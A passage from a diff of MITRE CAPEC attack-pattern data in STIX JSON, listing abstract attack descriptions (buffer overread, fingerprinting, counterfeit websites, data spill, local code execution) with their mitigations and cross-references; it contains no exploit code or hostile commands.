"x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705", + "\n Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.\n In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine parameters: Determine all user-controllable parameters of the application either by probing or by finding documentation

Experiment

  1. Cause error condition: Inject each parameter with content that causes an error condition to manifest

  2. Modify parameters: Modify the content of each parameter according to observed error conditions

Exploit

  1. Follow up attack: Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "attack-pattern--ce75149a-6882-4b07-8841-db9d6a9ec20d", + "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12" + ], + "x_capec_prerequisites": [ + "This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary.\n The Attack does not need special hardware, software, skills, or access.\n " + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60cbe06e-8a08-42af-a4ab-f81130b139ce", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-540", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/540.html" + }, + { + "external_id": "CWE-125", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/125.html" + } + ], + "id": "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overread Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Depending on the use of the target buffer, an application or system crash can be achieved.)" + ], + "Confidentiality": [ + "Read Data (By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overread on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find attack vector: The adversary identifies an attack vector by looking for areas in the application where they can specify to read more data than is required.

Exploit

  1. Overread the buffer: The adversary provides input to the application that gets it to read past the bounds of a buffer, possibly revealing sensitive information that was not intended to be given to the adversary.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.", + "external_references": [ + { + "external_id": "CAPEC-541", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/541.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Gather Victim Host Information: Software", + "external_id": "T1592.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1592/002" + } + ], + "id": "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "attack-pattern--8b7dfd02-8d21-4eed-a2a3-d9f73ed49a48", + "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.", + "external_references": [ + { + "external_id": "CAPEC-542", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/542.html" + }, + { + "description": "Develop Capabilities: Malware", + "external_id": "T1587.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1587/001" + }, + { + "description": "Obfuscated Files or Information", + "external_id": "T1027", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027" + } + ], + "id": "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Targeted Malware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "attack-pattern--c253fd5b-9ae6-4f42-868a-52b25b7dd1f4" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "external_id": "CAPEC-543", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Websites", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.", + "external_references": [ + { + "external_id": "CAPEC-544", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/544.html" + } + ], + "id": "attack-pattern--996aa0f7-950e-4435-a60d-ae859e545101", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Organizations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.", + "external_references": [ + { + "external_id": "CAPEC-545", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/545.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Credentials from Password Stores:Keychain", + "external_id": "T1555.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555/001" + } + ], + "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Pull Data from System Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "external_id": "CAPEC-546", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "external_id": "REF-461", + "source_name": "reference_from_CAPEC", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf" + } + ], + "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Incomplete Data Deletion in a Multi-Tenant Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse directory structure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.", + "id": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1ffd89f-d766-48a7-b7d3-8d46fe11517b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deletion of data should be completed promptly when requested.", + "id": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd548983-e701-4e46-9b7c-cfc9318fd925", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.", + "external_references": [ + { + "external_id": "CAPEC-547", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/547.html" + } + ], + "id": "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Physical Destruction of Device or Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. When this happens, the contaminated information system, device, or network must be brought offline to investigate and mitigate the data spill, which denies availability of the system until the investigation is complete.", + "external_references": [ + { + "external_id": "CAPEC-548", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/548.html" + }, + { + "description": "Florida Industrial Security Working Group (FISWG), Managing a “Data Spill”", + "external_id": "REF-742", + "source_name": "reference_from_CAPEC", + "url": "https://fiswg.research.ucf.edu/Documents/PPT/Manage%20a%20Data%20Spill-Contamination%20September%202015.pptx" + }, + { + "description": "data spillage", + "external_id": "REF-743", + "source_name": "reference_from_CAPEC", + "url": "https://csrc.nist.gov/glossary/term/data_spillage" + } + ], + "id": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contaminate Resource", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Data Spill" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Read Data (Victims of the attack can be exposed to classified materials)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An insider threat was able to obtain a classified document. They have knowledge that a backend server which provides access to a website also runs a mail server. The adversary creates a throwaway email address and sends the classified document to the mail server. When an administrator checks the mail server they notice that it has processed an email with a classified document and the server has to be taken offline while they investigate the contamination. In the meantime, the website has to be taken down as well and access to the website is denied until the backend can be migrated to another server or the investigation is complete.\n " + ], + "x_capec_extended_description": "Contamination through email is a very common attack vector. Systems with email servers or personal work systems using email are susceptible to this attack simply by receiving an email that contains a classified document or information. A fake classified document could even be used that is mistaken as true classified material. This would still cause the system to be taken offline until the validity of the classified material is confirmed.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs to have real or fake classified/sensitive information to place on a system" + ], + "x_capec_skills_required": { + "High": "The ability to obtain a classified document or information", + "Low": "The ability to fake a classified document" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly safeguard classified/sensitive data. This includes training cleared individuals to ensure they are handling and disposing of this data properly, as well as ensuring systems only handle information of the classification level they are designed for.", + "id": "course-of-action--56f9ad78-5ec1-40cb-9b11-3691370aea5c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52919114-149c-439f-8afc-f504066b9c27", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--56f9ad78-5ec1-40cb-9b11-3691370aea5c", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems with redundancy in mind. This could mean creating backing servers that could be switched over to in the event that a server has to be taken down for investigation.", + "id": "course-of-action--54cbddef-f017-46a0-9881-db189187b27c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d8503be-d28c-4932-a598-2ccce9d1e9fc", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54cbddef-f017-46a0-9881-db189187b27c", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a planned and efficient response plan to limit the amount of time a system is offline while the contamination is investigated.", + "id": "course-of-action--632c8db2-657e-4918-a5a6-0afd926f3fed", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a086aa4b-4a91-42df-9fa8-06cb87a76353", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--632c8db2-657e-4918-a5a6-0afd926f3fed", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.", + "external_references": [ + { + "external_id": "CAPEC-549", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/549.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + } + ], + "id": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Local Execution of Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_prerequisites": [ + "Knowledge of the target system's vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system." + ], + "x_capec_resources_required": [ + "The means by which the adversary intends to place the malicious code on 